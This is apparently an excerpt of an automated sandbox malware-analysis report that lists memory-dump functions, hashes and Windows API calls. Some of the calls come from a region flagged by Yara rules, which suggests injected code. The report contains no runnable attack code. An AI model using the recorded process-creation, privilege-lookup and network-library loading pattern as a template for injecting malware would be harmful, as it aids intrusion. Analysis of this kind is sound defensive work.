                                                                    • Instruction ID: 56179e60b2a6233222294bd9a9880e05a58cd217952a086748923098c9e06053
                                                                    • Opcode Fuzzy Hash: deead70040d2e4bc9da3520716dd64da9556e80867e2e777f4c15fe63662329a
                                                                    • Instruction Fuzzy Hash: 8B90027120504842D14475994445A47003997D0355F91D111A0054798DA6A58D55F6A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e9187e79293386cc723050688ed43293ae458d487abba52d674f2d0903ec84de
                                                                    • Instruction ID: 2df1ec5e86cb748f0f251d71016d87fca50318ba7be11a2293828283c8ee0831
                                                                    • Opcode Fuzzy Hash: e9187e79293386cc723050688ed43293ae458d487abba52d674f2d0903ec84de
                                                                    • Instruction Fuzzy Hash: 6790027120100802D1847599444564B002997D1351FD1D115A0015758DDA958A59B7E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 05a08a14b34042d7baa21ce55b1ce2cb997a6676dc15800ba98d67a34e9789b2
                                                                    • Instruction ID: f9912cb6721b7d4b8397707d721ac6ba1ec0d09e9f10c1b23002debcb6866e37
                                                                    • Opcode Fuzzy Hash: 05a08a14b34042d7baa21ce55b1ce2cb997a6676dc15800ba98d67a34e9789b2
                                                                    • Instruction Fuzzy Hash: DB90027120100842D10465994445B47002997E0351F91D116A0114758D9695C851B561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1a7da3734891d3fe0ba868bc323345fcf77fa971a8fb85b36b33c6b8810ab060
                                                                    • Instruction ID: cc221e70caa9e5e7822271bd06d2b05b35921a3fda58b7c0d82ea606cdd08979
                                                                    • Opcode Fuzzy Hash: 1a7da3734891d3fe0ba868bc323345fcf77fa971a8fb85b36b33c6b8810ab060
                                                                    • Instruction Fuzzy Hash: E790027120108802D1146599844574B002997D0351F95D511A441475CD96D58891B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: eb13d39d93019f708e373dc272f04a0099ec07ba6dcb10b159742234c5c25cc2
                                                                    • Instruction ID: becefce2320cc945e726f718512383a9976839dddc23732e2697e4c624447f1d
                                                                    • Opcode Fuzzy Hash: eb13d39d93019f708e373dc272f04a0099ec07ba6dcb10b159742234c5c25cc2
                                                                    • Instruction Fuzzy Hash: 799002B120100402D14475994445747002997D0351F91D111A5054658E96D98DD5B6A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 45e749a058222ce9673e63db9dff9ef30fce3dce885900e9a2c2049aa5e25921
                                                                    • Instruction ID: fe2a0dfa2f17c642e976a4a0a98d12e3b6c575f99d4ef5d80fbd9d19ba970e28
                                                                    • Opcode Fuzzy Hash: 45e749a058222ce9673e63db9dff9ef30fce3dce885900e9a2c2049aa5e25921
                                                                    • Instruction Fuzzy Hash: 2C9002A134100442D10465994455B070029D7E1351F91D115E1054658D9699CC52B166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b113b3b623b68f4ded9af303a14aa065fa129e02cc8feb8d23509fa288eb957c
                                                                    • Instruction ID: f3019a8860630987eae437e80921a377452ecbded555b3f31a0529db3fcd5fb9
                                                                    • Opcode Fuzzy Hash: b113b3b623b68f4ded9af303a14aa065fa129e02cc8feb8d23509fa288eb957c
                                                                    • Instruction Fuzzy Hash: 9D900261242041525549B5994445507402AA7E02917D1D112A1404A54C95A69856E661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: f6b32ffb833f65551ddfe2a1b708f8ede6d9fbcd98b25e1e1a5bd1087a414c0c
                                                                    • Instruction ID: b227a1d77084f634421e2b1bafcf60c07633cf7548d297015e7fc6280fc0836c
                                                                    • Opcode Fuzzy Hash: f6b32ffb833f65551ddfe2a1b708f8ede6d9fbcd98b25e1e1a5bd1087a414c0c
                                                                    • Instruction Fuzzy Hash: E290027120100413D11565994545707002D97D0291FD1D512A041465CDA6D68952F161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5a1b2365532e8d35e751649c4adfdffdd128a2b520ebf07d4107802a8d9bfb63
                                                                    • Instruction ID: cc4858cf9fd9c6e05bb392901626d63e9ff602f2fb5909c5093da5cb2c06c6e9
                                                                    • Opcode Fuzzy Hash: 5a1b2365532e8d35e751649c4adfdffdd128a2b520ebf07d4107802a8d9bfb63
                                                                    • Instruction Fuzzy Hash: 0190026121180042D20469A94C55B07002997D0353F91D215A0144658CD9958861A561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 03327310, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 033273B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: 7238354acd6bffc519e80105fcf1543e7eee48473a8657143753e7ac47c44896
                                                                    • Instruction ID: 6e539f98ac182533fa8e4af5ea1c84a14c1af49feb1a3f07249b05cf1ed74504
                                                                    • Opcode Fuzzy Hash: 7238354acd6bffc519e80105fcf1543e7eee48473a8657143753e7ac47c44896
                                                                    • Instruction Fuzzy Hash: 18316EB6902704ABD711DF64C8E0FA7BBB8BF88700F04811DFA595B241D774A555CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 03327306, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 033273B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: cb63563684f7bb83f73f435358ed0f1cf794e6001f1ea9505927aaa0b0301a8a
                                                                    • Instruction ID: da098c3164df52e715518e33e8844a5115df5fef24a6b066b2068dcb8dbf733d
                                                                    • Opcode Fuzzy Hash: cb63563684f7bb83f73f435358ed0f1cf794e6001f1ea9505927aaa0b0301a8a
                                                                    • Instruction Fuzzy Hash: C52189B6A01200ABD711DF64C8E1FABBBA8BB88700F048519FA199B641D774A556CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 03328900, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03313B93), ref: 0332892D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: .z`
                                                                    • API String ID: 3298025750-1441809116
                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction ID: 5ebb27cdd740a18fd2429c4534eb2fecf5df32bd788e03670e4e5afa29a543b2
                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction Fuzzy Hash: CDE046B5200318ABDB18EF99CC88EA777ACEF88750F018558FE085B242C630F910CAF0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 03317290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 033172EA
                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0331730B
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 65b6b7f1cbdfb23ed4fcbbfb44b911093864a8b016dd4e1cff45753e09de2d3c
                                                                    • Instruction ID: ff9c9809ce834446e58bab0594d59c8a4d240b0d561c5eabf57c6df6da7aab42
                                                                    • Opcode Fuzzy Hash: 65b6b7f1cbdfb23ed4fcbbfb44b911093864a8b016dd4e1cff45753e09de2d3c
                                                                    • Instruction Fuzzy Hash: 3F01A235E803287BE725E6949C82FBE7B6C9B00B51F084118FF04BE2C0EA94691647F5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 03328970, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 033289C4
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction ID: 0385ef74ad40b80ae0d23437533f7000aad00e4d4517b2494c83780a65bd6808
                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction Fuzzy Hash: 2301AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 03327433, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0331CD00,?,?), ref: 0332747C
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: dff39591e1c7cef6e03fdc10b279e500c396836549ca8450aba43b775e7902a9
                                                                    • Instruction ID: 593840a3ce114d26291ccf5805be388e90cccbd4fca65d616dbb50cbd3783e85
                                                                    • Opcode Fuzzy Hash: dff39591e1c7cef6e03fdc10b279e500c396836549ca8450aba43b775e7902a9
                                                                    • Instruction Fuzzy Hash: CFF0277228031436D230A56C9C42F97BF98DB50F10F184119F689AB1C2D990F4454694
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 03327440, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0331CD00,?,?), ref: 0332747C
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                                                    • Instruction ID: d0af7d40075c9858b7a16036cfe1de7a2c1a4e10512f8e58e589bf8f86970c0c
                                                                    • Opcode Fuzzy Hash: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                                                    • Instruction Fuzzy Hash: 8CE092377803243AE330A59DAC42FA7B79CDB81B30F240026FA4DEB2C1D595F80142E8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 03328A53, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0331CFD2,0331CFD2,?,00000000,?,?), ref: 03328A90
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: dfba2c46a13f7f54b928f8f99597c75a34eae51b4fe70eb6c6161372265b54aa
                                                                    • Instruction ID: 6d0942919895855db5db95b22b331daf9cf1b9d7640f05aca04ee2f66e38731b
                                                                    • Opcode Fuzzy Hash: dfba2c46a13f7f54b928f8f99597c75a34eae51b4fe70eb6c6161372265b54aa
                                                                    • Instruction Fuzzy Hash: E5E06DB16003186BC720DF89CC86FDB3B69AF84650F018169FD0D6B242C931E9158BE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 03328A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0331CFD2,0331CFD2,?,00000000,?,?), ref: 03328A90
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction ID: d163f338e1c3b69d13dd4c7306a98eeca9d901e46974409e2393a906b9faecbf
                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction Fuzzy Hash: 36E01AB56003186BDB10DF49CC84EE737ADAF88650F018154BE085B242CA30F8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 033288C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(03323546,?,03323CBF,03323CBF,?,03323546,?,?,?,?,?,00000000,00000000,?), ref: 033288ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction ID: e4906e44f1fb594d73e6097d2e9d2f64351f9f17ff1719e51688e48cc5804758
                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction Fuzzy Hash: F2E012B5200318ABDB14EF99CC84EA777ACAF88650F118558BE085B242C630F910CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0331D440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,03317C93,?), ref: 0331D46B
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                    • Instruction ID: 5d7724b46a80e83f35900eed047a50a637fb461dd3540042891dd52089f0f84a
                                                                    • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                    • Instruction Fuzzy Hash: 6DD0A7767903083BE610FAA89C43F2672CC5B45A10F494064F949DB3C3DD54F4004561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: bbddc879283b4e77a6ada6e8086fcf40f3b037d1086a9fb20017ef771f71741a
                                                                    • Instruction ID: f8b771584563eab2e3066e72cd6aa6b86ccf0c9f5722e190f482e0aa6d85d289
                                                                    • Opcode Fuzzy Hash: bbddc879283b4e77a6ada6e8086fcf40f3b037d1086a9fb20017ef771f71741a
                                                                    • Instruction Fuzzy Hash: E6B09B719014C5C5D615D7A14608B277A257BD0751F56C151D2020745A4778C091F6B5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 0564FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 53%
                                                                    			E0564FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E055FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05645720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05645720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                    0x0564fdda
                                                                    0x0564fde2
                                                                    0x0564fde5
                                                                    0x0564fdec
                                                                    0x0564fdfa
                                                                    0x0564fdff
                                                                    0x0564fe0a
                                                                    0x0564fe0f
                                                                    0x0564fe17
                                                                    0x0564fe1e
                                                                    0x0564fe19
                                                                    0x0564fe19
                                                                    0x0564fe19
                                                                    0x0564fe20
                                                                    0x0564fe21
                                                                    0x0564fe22
                                                                    0x0564fe25
                                                                    0x0564fe40

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0564FDFA
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0564FE2B
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0564FE01
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: a5f5c28982bfbc77b80a0fcd4c1785e842a9cd6b42db0908b7faea86f2f3327f
                                                                    • Instruction ID: bc118a6b2a0769a1fa695a9bfb4d251df924e124a803cee3d0e59b4e960f5cac
                                                                    • Opcode Fuzzy Hash: a5f5c28982bfbc77b80a0fcd4c1785e842a9cd6b42db0908b7faea86f2f3327f
                                                                    • Instruction Fuzzy Hash: 62F0F636244201BFE7201A45DC06F63BF5AEB44730F144314F628566D1DA62F820DBF4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%